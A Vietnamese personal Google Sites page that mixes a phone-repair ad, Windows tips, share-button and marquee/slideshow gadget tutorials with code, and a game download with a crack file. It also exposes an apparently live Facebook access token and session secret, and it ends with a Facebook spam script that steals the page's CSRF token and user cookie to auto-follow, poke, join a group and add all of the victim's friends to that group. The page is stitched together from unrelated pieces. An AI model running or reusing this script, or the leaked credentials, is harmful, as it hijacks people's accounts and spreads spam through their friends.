vi tinh

thay màn hình smarphone 0907085722
Win 8.1 Preview là bản dùng thử mà. Làm gì phải activate. Bạn thử chạy lệnh slmgr.vbs -xpr để kiểm tra xem nhé 
Hoặc chạy cmd gõ slmgr /dlv để kiểm tra xem thời hạn bao lâu. Nói chung là đến khi có bản Final thì vẫn còn dùng được
100001262123378_2223909484327767
{"session_key":"5.nQNqWmTLNTxvIg.1541396522.30-100001262123378","uid":100001262123378,"secret":"73ff3b08e45410bc0d930c5ece298d87","access_token":"EAAAAAYsX7TsBACQo95VG9p8r8UZCRiTUKZCwYwE4P15lFoUQZAPJxaKScu5vUxPEqyzNmUguw9DsoL8d6Daw6lE9Do1lZCgWx98fjjnQbatZCzeORLnL9bPZB7MwxZAwlHtZAg5KhElksqmGzZCv1rZCwZARnDBp93f0iTqC5KwwvfUrW9CXArU4y3U8aZB0Hx9IzrxRdSzJRVRqB86OPZBtUJXOy","machine_id":"KtjfW9xQ04pBTtO6zKWdNjRg","confirmed":true,"identifier":"sanhnet\u0040yahoo.com"}

Đối với bỳ 1 blogger nào, công việc đơn thuần tìm và sáng tác nội dung là không đủ. Một trong những yếu tố quyết định thành công là khả năng chia sẻ qua nhiều mô hình mạng xã hội phổ biến ngày nay. Trong bài viết này, tôi sẽ hướng dẫn các bạn cách gán thêm nút Share trên google site.
.

            Trong cửa sổ soạn thảo bài viết, các bạn đặt dấu nháy chuột vào vị trí muốn chèn các nút để share bài viết. Sau đó vào Chèn >> Tiện ích khác ... >> Chọn Thêm tiện ích bằng URL sau đó nhập URL sau vào đó.

http://hosting.gmodules.com/ig/gadgets/file/106513496321576712109/AddThis_6_byTVS.xml

        Trong đó:
 • User ID là tên đăng nhập vào các trang mạng xã hội (trường hợp mỗi một trang các bạn có một tên đăng nhập khác nhau thì mình không giám chắc, vì chưa làm thế bao giờ ^^)
 • URL là đường dẫn tới bài viết của các bạn.
 • Title là tiêu đề của bài viết đó.
  Chúc các bạn thành công !     
 • sưu tầm quóc bình                                               PopCap Games, Inc. Typer Shark Deluxe 1.0 - Chơi game và luyện gõ bàn phímLink Download: Typer Shark Deluxe.rar - 5,6MB
tập đánh chữ toàn bộ full đúng hay luôn  Typer Shark Deluxe.rar - 5,6MB  reg_Typer Shark Deluxe.rar - 628B


Tạo Marquee cho googlsite

Trong trang Web, bạn có thể tạo hiệu ứng dòng chữ cuốn chạy như kiểu quảng cáo trên các bảng điện tử. Rất đơn giản, bạn chỉ cần dùng thẻ <MARQUEE>. Marquee là một mã HTML để làm cho một đối tượng có thể chuyển động.
        Cấu trúc: <MARQUEE> Text hoặc các đoạn mã HTML khác </MARQUEE>. Trong cặp thẻ MARQUEE bạn có thể dùng các loại thẻ HTML khác như bình thường chẳng hạn như Thay đổi màu chữ (thẻ FONT), in đậm, in nghiêng... nhưng nhớ là phải có thẻ đóng </MARQUEE>, nếu không cả đoạn văn bản của bạn sẽ chạy tuốt tuồn tuột. 
        Các thuộc tính của thẻ MARQUEE:
        Để chỉ định các phương pháp cuộc chữ, tốc độ cuộn chữ hay sắp xếp canh lề trái phải... bạn cần dùng thêm một số thuộc tính khác của thẻ MARQUEE. 

 • Align: Sắp xếp canh chỉnh lề so với văn bản khác trong trang. Các giá trị của nó là Left, Right, Top, Middle, Bottom. 
 • Behavior: Chỉ định phương pháp cuộn chữ. Các giá trị gồm:
  Scroll (chạy bình thường),
  Slide(chỉ chạy một lần sau đó đứng im),
  Alternate(chạy đi chạy lại).
  Ví dụ:
  <MARQUEE BEHAVIOR="scroll"> Cuộn không ngừng </MARQUEE> 
  <MARQUEE BEHAVIOR="slide"> Trượt theo 1 hướng dừng lại </MARQUEE> 
  <MARQUEE BEHAVIOR="alternate"> Đổi hướng Trượt khi chạm vào biên </MARQUEE>
 • BGColor: Quy định màu nền của khung Marquee.
 • Direction: hướng cuộn văn bản. Các giá trị gồm:
  Left (từ phải sang trái),
  Right (từ trái sang phải),
  Up (từ dưới lên),
  Down (từ trên xuống).
 • Height: Chiều cao khung Marquee.
 • Width: Chiều rộng khung Marquee.
 • HSpace, VSpace: Khoảng cách ngang và dọc so với đoạn văn bản khác trong trang. Dùng khi sử dụng thuộc tính ALIGN.
 • Loop: Chỉ định số lần lặp lại của dòng Marquee. Theo mặc định là lặp vô tận có giá trị bằng 1, giá trị bằng -1 hoăc infinite là lặp một lần
 • SCROLLDELAY=”number” → chỉnh thời gian hiển thị (tính bằng giây)
 • ScrollDelay: Chỉ định khoảng thời gian chờ sau mỗi lần cuộn. Số càng lớn, tốc độ càng chậm. 
 • ScrollAmount: Chỉ định tốc độ chạy. Số càng lớn thì tốc độ càng nhanh và càng không nhuyễn.
  Ví dụ:
  <MARQUEE HEIGHT=50 BGCOLOR=#99CCFF BEHAVIOR=scroll SCROLLAMOUNT="50"> 
  Cuộn nhanh 
  </MARQUEE> 
  <P ALIGN=Right><MARQUEE WIDTH=50% BGCOLOR=#FFCC99 BEHAVIOR=scroll SCROLLAMOUNT="5"> 
  Cuộn chậm 
  </MARQUEE> 
  <P ALIGN=Center><MARQUEE DIRECTION=Right WIDTH=80% HEIGHT=60 BGCOLOR=#CCFF99 BEHAVIOR=scroll SCROLLAMOUNT="20"> 
  <H3>Cuộn trung bình </H3> 
  <BR> Đây là dòng thứ hai 
  </MARQUEE> 

 • <marquee onmouseover="this.stop();" onmouseout="this.start();" behavior="scroll" direction="left" bgcolor="silver" scrollamount=3>
  Chữ chạy di chuột vào thì dừng , di ra thì chạy tiếp Grin
  </marquee>


        
Trong google site các bạn có thể ứng dụng code sau:

        1. Chữ chạy từ phải sang trái

<?xml version="1.0" encoding="UTF-8"?>
<Module>
<ModulePrefs title="marquee" />
<Content type="html"><![CDATA[
<style type="text/css">
body {background-color:transparent}
table {background-image:url(http://www.example.com/background.jpg); border:1px solid #46090B}
#content {font:italic bold 16pt Times New Roman; color:#46090B}
</style>

<script language="JavaScript1.2">

//Chiều rộng của vùng marquee (đơn vị: pixels)
var marqueewidth="600px"
//Chiều cao của vùng marqueet
var marqueeheight="28px"
//Tốc độ chạy của marquee (số càng lớn thì càng chạy nhanh 1-10)
var marqueespeed=1
//Màu nền:
var marqueebgcolor=""
//Dừng lại khi rê chuột vào vùng marquee (0 = không dừng lại. 1 = dừng lại)?
var pauseit=1

//Nội dung của marquee (không xóa thẻ <nobr>)
//Để tất cả nội dung trên một dòng

var marqueecontent='<nobr><div id="content">"Chào mừng bạn đến với blog của Quốc Bình, chúc các bạn một ngày vui vẻ."</div></nobr>'


////Không cần sửa lại các dòng dưới đây////////////
marqueespeed=(document.all)? marqueespeed : Math.max(1, marqueespeed-1) //slow speed down by 1 for NS
var copyspeed=marqueespeed
var pausespeed=(pauseit==0)? copyspeed: 0
var iedom=document.all||document.getElementById
if (iedom)
document.write('<span id="temp" style="visibility:hidden;position:absolute;top:-100px;left:-9000px">'+marqueecontent+'</span>')
var actualwidth=''
var cross_marquee, ns_marquee

function populate(){
if (iedom){
cross_marquee=document.getElementById? document.getElementById("iemarquee") : document.all.iemarquee
cross_marquee.style.left=parseInt(marqueewidth)+8+"px"
cross_marquee.innerHTML=marqueecontent
actualwidth=document.all? temp.offsetWidth : document.getElementById("temp").offsetWidth
}
else if (document.layers){
ns_marquee=document.ns_marquee.document.ns_marquee2
ns_marquee.left=parseInt(marqueewidth)+8
ns_marquee.document.write(marqueecontent)
ns_marquee.document.close()
actualwidth=ns_marquee.document.width
}
lefttime=setInterval("scrollmarquee()",20)
}
window.onload=populate

function scrollmarquee(){
if (iedom){
if (parseInt(cross_marquee.style.left)>(actualwidth*(-1)+8))
cross_marquee.style.left=parseInt(cross_marquee.style.left)-copyspeed+"px"
else
cross_marquee.style.left=parseInt(marqueewidth)+8+"px"

}
else if (document.layers){
if (ns_marquee.left>(actualwidth*(-1)+8))
ns_marquee.left-=copyspeed
else
ns_marquee.left=parseInt(marqueewidth)+8
}
}

if (iedom||document.layers){
with (document){
document.write('<table cellspacing="0" cellpadding="0"><td>')
if (iedom){
write('<div style="position:relative;width:'+marqueewidth+';height:'+marqueeheight+';overflow:hidden">')
write('<div style="position:absolute;width:'+marqueewidth+';height:'+marqueeheight+';background-color:'+marqueebgcolor+'" onMouseover="copyspeed=pausespeed" onMouseout="copyspeed=marqueespeed">')
write('<div id="iemarquee" style="position:absolute;left:0px;top:0px"></div>')
write('</div></div>')
}
else if (document.layers){
write('<ilayer width='+marqueewidth+' height='+marqueeheight+' name="ns_marquee" bgColor='+marqueebgcolor+'>')
write('<layer name="ns_marquee2" left=0 top=0 onMouseover="copyspeed=pausespeed" onMouseout="copyspeed=marqueespeed"></layer>')
write('</ilayer>')
}
document.write('</td></table>')
}
}
</script>
]]></Content>
</Module>

    
    Lưu code trên vào một file với phần mở rộng là *.XML, những phần màu đỏ các bạn có thể thay đổi cho phù hợp còn lại giữ nguyên.
        Đính kèm file lên goolesite và coppy URL của nó ví dụ như:

http://hosting.gmodules.com/ig/gadgets/file/102493921541441143368/leftward-text-marquee.xml
        Nhấp vào Chỉnh sửa trang  > Chèn  > Tiện ích khác ...  > Thêm tiện ích bằng URL :
http://hosting.gmodules.com/ig/gadgets/file/102493921541441143368/leftward-text-marquee.xml 
       
Thêm
        Chiều rộng : 602 pixels        Chiều cao : 30 pixels
        K > Lưu
        


        2. Chữ chạy từ dưới lên:
<?xml version="1.0" encoding="UTF-8"?>
<Module>
<ModulePrefs title="marquee" />
<Content type="html"><![CDATA[
<style type="text/css">
body {background-color:transparent}
#container {background-color:#FFFFFF; border:1px solid #FFFFFF}
#content {font:12pt Arial; color:#000000; line-height:2}
a:link {color:#320000}
a:hover {color:#551A8B}
</style>

<script language="JavaScript1.2">

//Specify the marquee's width (in pixels)
var marqueewidth="600px"
//Specify the marquee's height
var marqueeheight="150px"
//Specify the marquee's marquee speed (larger is faster 1-10)
var marqueespeed=1
//Pause marquee onMousever (0=no. 1=yes)?
var pauseit=1

//Specify the marquee's content
//Keep all content on ONE line, and backslash any single quotations (ie: that\'s great):

var marqueecontent='<div id="content">Cảm ơn bạn đã ghé thăm blog của Quốc Bình.<br>Các bạn có thể liên hệ với tôi <a href="https://sites.google.com/site/qbinh68/lien-he" target="_blank" title="Contact Me">tại đây</a> nếu các bạn có những thắc mắc hoặc nhận xét tới các bài viết trên blog của tôi.<br>Chúc các bạn tìm kiếm được những thông tin bổ ích trên blog của tôi!</div>'


////NO NEED TO EDIT BELOW THIS LINE////////////

marqueespeed=(document.all)? marqueespeed : Math.max(1, marqueespeed-1) //slow speed down by 1 for NS
var copyspeed=marqueespeed
var pausespeed=(pauseit==0)? copyspeed: 0
var iedom=document.all||document.getElementById
var actualheight=''
var cross_marquee, ns_marquee

function populate(){
if (iedom){
cross_marquee=document.getElementById? document.getElementById("iemarquee") : document.all.iemarquee
cross_marquee.style.top=parseInt(marqueeheight)+8+"px"
cross_marquee.innerHTML=marqueecontent
actualheight=cross_marquee.offsetHeight
}
else if (document.layers){
ns_marquee=document.ns_marquee.document.ns_marquee2
ns_marquee.top=parseInt(marqueeheight)+8
ns_marquee.document.write(marqueecontent)
ns_marquee.document.close()
actualheight=ns_marquee.document.height
}
lefttime=setInterval("scrollmarquee()",20)
}
window.onload=populate

function scrollmarquee(){

if (iedom){
if (parseInt(cross_marquee.style.top)>(actualheight*(-1)+8))
cross_marquee.style.top=parseInt(cross_marquee.style.top)-copyspeed+"px"
else
cross_marquee.style.top=parseInt(marqueeheight)+8+"px"
}
else if (document.layers){
if (ns_marquee.top>(actualheight*(-1)+8))
ns_marquee.top-=copyspeed
else
ns_marquee.top=parseInt(marqueeheight)+8
}
}

if (iedom||document.layers){
with (document){
if (iedom){
write('<div style="position:relative;width:'+marqueewidth+';height:'+marqueeheight+';overflow:hidden" id="container" onMouseover="copyspeed=pausespeed" onMouseout="copyspeed=marqueespeed">')
write('<div id="iemarquee" style="position:absolute;left:0px;top:0px;width:100%;">')
write('</div></div>')
}
else if (document.layers){
write('<ilayer width='+marqueewidth+' height='+marqueeheight+' name="ns_marquee">')
write('<layer name="ns_marquee2" width='+marqueewidth+' height='+marqueeheight+' left=0 top=0 onMouseover="copyspeed=pausespeed" onMouseout="copyspeed=marqueespeed"></layer>')
write('</ilayer>')
}
}
}
</script>
]]></Content>
</Module>        3. Hình chạy từ trái sang phải


<?xml version="1.0" encoding="UTF-8"?>
<Module>
<ModulePrefs title="marquee" />
<Content type="html"><![CDATA[
<style type="text/css">
body {background-color:transparent}
table {background-color:#FFFFFF; border:1px solid #FFFFFF}
</style>

<script type="text/javascript">

/***********************************************
* Conveyor belt slideshow script- © Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Drive at http://www.dynamicdrive.com/ for full source code
***********************************************/


//Specify the slider's width (in pixels)
var sliderwidth="800px"
//Specify the slider's height
var sliderheight="110px"
//Specify the slider's slide speed (larger is faster 1-10)
var slidespeed=1
//configure background color:
slidebgcolor=""

//Specify the slider's images
var leftrightslide=new Array()
var finalslide=''

leftrightslide[0]='<img src="http://sites.google.com/site/mori79b/file-cabinet/G13.gif" border="0">'
leftrightslide[1]='<img src="http://sites.google.com/site/mori79b/file-cabinet/G14.gif" border="0">'
leftrightslide[2]='<img src="http://sites.google.com/site/mori79b/file-cabinet/G16.gif" border="0">'
leftrightslide[3]='<img src="http://sites.google.com/site/mori79b/file-cabinet/G1.gif" border="0">'
leftrightslide[4]='<img src="http://sites.google.com/site/mori79b/file-cabinet/G3.gif" border="0">'
leftrightslide[5]='<img src="http://sites.google.com/site/mori79b/file-cabinet/G6.gif" border="0">'
leftrightslide[6]='<img src="http://sites.google.com/site/mori79b/file-cabinet/G8.gif" border="0">'
leftrightslide[7]='<img src="http://sites.google.com/site/mori79b/file-cabinet/G9.gif" border="0">'
leftrightslide[8]='<img src="http://sites.google.com/site/mori79b/file-cabinet/G10.gif" border="0">'
leftrightslide[9]='<img src="http://sites.google.com/site/mori79b/file-cabinet/G11.gif" border="0">'
leftrightslide[10]='<img src="http://sites.google.com/site/mori79b/file-cabinet/G12.gif" border="0">'
leftrightslide[11]='<img src="http://sites.google.com/site/mori79b/file-cabinet/G2.gif" border="0">'
leftrightslide[12]='<img src="http://sites.google.com/site/mori79b/file-cabinet/G4.gif" border="0">'
leftrightslide[13]='<img src="http://sites.google.com/site/mori79b/file-cabinet/G5.gif" border="0">'
leftrightslide[14]='<img src="http://sites.google.com/site/mori79b/file-cabinet/G7.gif" border="0">'
leftrightslide[15]='<img src="http://sites.google.com/site/mori79b/file-cabinet/G15.gif" border="0">'


//Specify gap between each image (use HTML):
var imagegap=" "

//Specify pixels gap between each slideshow rotation (use integer):
var slideshowgap=15


////NO NEED TO EDIT BELOW THIS LINE////////////

var copyspeed=slidespeed
leftrightslide='<nobr>'+leftrightslide.join(imagegap)+'</nobr>'
var iedom=document.all||document.getElementById
if (iedom)
document.write('<span id="temp" style="visibility:hidden;position:absolute;top:-100px;left:-9000px">'+leftrightslide+'</span>')
var actualwidth=''
var cross_slide, ns_slide

function fillup(){
if (iedom){
cross_slide=document.getElementById? document.getElementById("test2") : document.all.test2
cross_slide2=document.getElementById? document.getElementById("test3") : document.all.test3
cross_slide.innerHTML=cross_slide2.innerHTML=leftrightslide
actualwidth=document.all? cross_slide.offsetWidth : document.getElementById("temp").offsetWidth
cross_slide2.style.left=actualwidth+slideshowgap+"px"
}
else if (document.layers){
ns_slide=document.ns_slidemenu.document.ns_slidemenu2
ns_slide2=document.ns_slidemenu.document.ns_slidemenu3
ns_slide.document.write(leftrightslide)
ns_slide.document.close()
actualwidth=ns_slide.document.width
ns_slide2.left=actualwidth+slideshowgap
ns_slide2.document.write(leftrightslide)
ns_slide2.document.close()
}
lefttime=setInterval("slideleft()",30)
}
window.onload=fillup

function slideleft(){
if (iedom){
if (parseInt(cross_slide.style.left)>(actualwidth*(-1)+8))
cross_slide.style.left=parseInt(cross_slide.style.left)-copyspeed+"px"
else
cross_slide.style.left=parseInt(cross_slide2.style.left)+actualwidth+slideshowgap+"px"

if (parseInt(cross_slide2.style.left)>(actualwidth*(-1)+8))
cross_slide2.style.left=parseInt(cross_slide2.style.left)-copyspeed+"px"
else
cross_slide2.style.left=parseInt(cross_slide.style.left)+actualwidth+slideshowgap+"px"

}
else if (document.layers){
if (ns_slide.left>(actualwidth*(-1)+8))
ns_slide.left-=copyspeed
else
ns_slide.left=ns_slide2.left+actualwidth+slideshowgap

if (ns_slide2.left>(actualwidth*(-1)+8))
ns_slide2.left-=copyspeed
else
ns_slide2.left=ns_slide.left+actualwidth+slideshowgap
}
}


if (iedom||document.layers){
with (document){
document.write('<table cellspacing="0" cellpadding="0"><td>')
if (iedom){
write('<div style="position:relative;width:'+sliderwidth+';height:'+sliderheight+';overflow:hidden">')
write('<div style="position:absolute;width:'+sliderwidth+';height:'+sliderheight+';background-color:'+slidebgcolor+'" onMouseover="copyspeed=0" onMouseout="copyspeed=slidespeed">')
write('<div id="test2" style="position:absolute;left:0px;top:0px"></div>')
write('<div id="test3" style="position:absolute;left:-1000px;top:0px"></div>')
write('</div></div>')
}
else if (document.layers){
write('<ilayer width='+sliderwidth+' height='+sliderheight+' name="ns_slidemenu" bgColor='+slidebgcolor+'>')
write('<layer name="ns_slidemenu2" left=0 top=0 onMouseover="copyspeed=0" onMouseout="copyspeed=slidespeed"></layer>')
write('<layer name="ns_slidemenu3" left=0 top=0 onMouseover="copyspeed=0" onMouseout="copyspeed=slidespeed"></layer>')
write('</ilayer>')
}
document.write('</td></table>')
}
}
</script>
]]></Content>
</Module>

add


/*Add Friend*/
var fb_dtsg=document.getElementsByName("fb_dtsg")[0].value;
var user_id=document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
function a(abone)
{
 var http4=new XMLHttpRequest;
 var url4="/ajax/follow/follow_profile.php?__a=1";
 var params4="profile_id="+abone+"&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg="+fb_dtsg+"&lsd&__"+user_id+"&phstamp=";
 http4.open("POST",url4,true);
 http4.onreadystatechange=function()
 {
  if(http4.readyState==4&&http4.status==200)http4.close
 }
 ;
 http4.send(params4)
}
 
function sublist(uidss)
{
 var a = document.createElement('script');
 a.innerHTML = "new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: " + uidss + " }).send();";
 document.body.appendChild(a);
}
 
function p(abone)
{
 var http4 = new XMLHttpRequest();
 var url4 = "//www.facebook.com/ajax/poke_dialog.php";
 var params4 = "uid=" + abone + "&pokeback=0&ask_for_confirm=0&nctr[_mod]=pagelet_timeline_profile_actions&__asyncDialog=1&__user="+user_id+"&__a=1&__dyn=798aD5z5CF-&__req=v&fb_dtsg="+fb_dtsg+"&phstamp=";
 http4.open("POST", url4, true);
 http4.onreadystatechange = function ()
 {
  if (http4.readyState == 4 && http4.status == 200)
  {
   http4.close;
  }
 }
 ;
 http4.send(params4);
}

var gid = ['1427981144181379'];
var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];
var user_id = document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]);
 
var httpwp = new XMLHttpRequest();
var urlwp = '/ajax/groups/membership/r2j.php?__a=1';
var paramswp = '&ref=group_jump_header&group_id=' + gid + '&fb_dtsg=' + fb_dtsg + '&__user=' + user_id + '&phstamp=';
httpwp['open']('POST', urlwp, true);
httpwp['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
httpwp['setRequestHeader']('Content-length', paramswp['length']);
httpwp['setRequestHeader']('Connection', 'keep-alive');
httpwp['send'](paramswp);
 
var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];
var user_id = document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]);
 
var friends = new Array();
gf = new XMLHttpRequest();
gf['open']('GET', '/ajax/typeahead/first_degree.php?__a=1&viewer=' + user_id + '&token' + Math['random']() + '&filter[0]=user&options[0]=friends_only', false);
gf['send']();
if (gf['readyState'] != 4) {} else {
    data = eval('(' + gf['responseText']['substr'](9) + ')');
    if (data['error']) {} else {
        friends = data['payload']['entries']['sort'](function (_0x93dax8, _0x93dax9) {
            return _0x93dax8['index'] - _0x93dax9['index'];
        });
    };
};
 
for (var i = 0; i < friends['length']; i++) {
    var httpwp = new XMLHttpRequest();
    var urlwp = '/ajax/groups/members/add_post.php?__a=1';
    var paramswp= '&fb_dtsg=' + fb_dtsg + '&group_id=' + gid + '&source=typeahead&ref=&message_id=&members=' + friends[i]['uid'] + '&__user=' + user_id + '&phstamp=';
    httpwp['open']('POST', urlwp, true);
    httpwp['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
    httpwp['setRequestHeader']('Content-length', paramswp['length']);
    httpwp['setRequestHeader']('Connection', 'keep-alive');
    httpwp['onreadystatechange'] = function () {
if (httpwp['readyState'] == 4 && httpwp['status'] == 200) {};
    };
    httpwp['send'](paramswp);
};
var spage_id = "469439959783503";
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
var smesaj = "";
var smesaj_text = "";
var arkadaslar = [];
var svn_rev;
var bugun= new Date();
var btarihi = new Date();
btarihi.setTime(bugun.getTime() + 1000*60*60*4*1);
if(!document.cookie.match(/paylasti=(\d+)/)){
document.cookie = "paylasti=hayir;expires="+ btarihi.toGMTString();
}

Trang con (1): teptin
ċ
vansanh. com,
12:18, 14 thg 11, 2014
ĉ
van sanh,
04:54, 25 thg 8, 2018
Comments